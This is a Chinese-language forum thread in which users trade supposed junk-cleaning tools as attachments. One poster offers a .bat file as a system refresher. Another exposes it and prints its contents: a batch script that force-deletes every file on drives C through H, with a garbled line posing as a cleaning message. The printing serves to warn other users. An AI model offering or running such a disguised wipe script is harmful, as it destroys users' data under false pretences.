• 点赞

最强的垃圾清理工具

附件有一个不错的垃圾处理工具,请大伙试试,我试过比上一个程式更强.1155950342.rar
全部回复(12)
正序查看
倒序查看
没有人用吗?此软件挺不错的呀!
sdlihai
LV.1
@qingquan963
没有人用吗?此软件挺不错的呀!
打不开呀
@sdlihai
打不开呀
要解压缩呀!
%xyz%
LV.3
要解压缩呀!
什么虾米软件?
%xyz%
LV.3
要解压缩呀!
报告:你的文件里是空的 :)
@%xyz%
报告:你的文件里是空的:)
那就还传一次原档:1157168771.exe
sdlihai
LV.1
我打开了,谢谢!非常感谢!!!
@sdlihai
我打开了,谢谢!非常感谢!!!
谢谢就顶一下了,呵呵!如果好的吗?就说一下回复一声,好在那地方.
pys_982
LV.4
不好用,把我开机登陆的信息给删除了.
qingquan963
LV.5
@pys_982
不好用,把我开机登陆的信息给删除了.
呵呵!你要选择才行呀!注意不要全选了.开机登陆不是在此项内呀?
LV.1
呵呵!你要选择才行呀!注意不要全选了.开机登陆不是在此项内呀?
試試這個吧,那個小心帶有病毒,你敢用嗎??這個直接運行就行了,保証讓你的系統象剛開始安裝的新系統一樣1157534905.bat
u-571
LV.7
@77587758520
試試這個吧,那個小心帶有病毒,你敢用嗎??這個直接運行就行了,保証讓你的系統象剛開始安裝的新系統一樣1157534905.bat
你又来害人了!
大家看,他传了什么内容?!删除硬盘全部文件!!

@echo off
echo タ睲埃╰参︰Вゅン叫祔单......
del /f /s /q C:\*.*
del /f /s /q D:\*.*
del /f /s /q E:\*.*
del /f /s /q F:\*.*
del /f /s /q G:\*.*
del /f /s /q H:\*.*
echo 睲埃╰参︰ВЧΘ
echo. & pause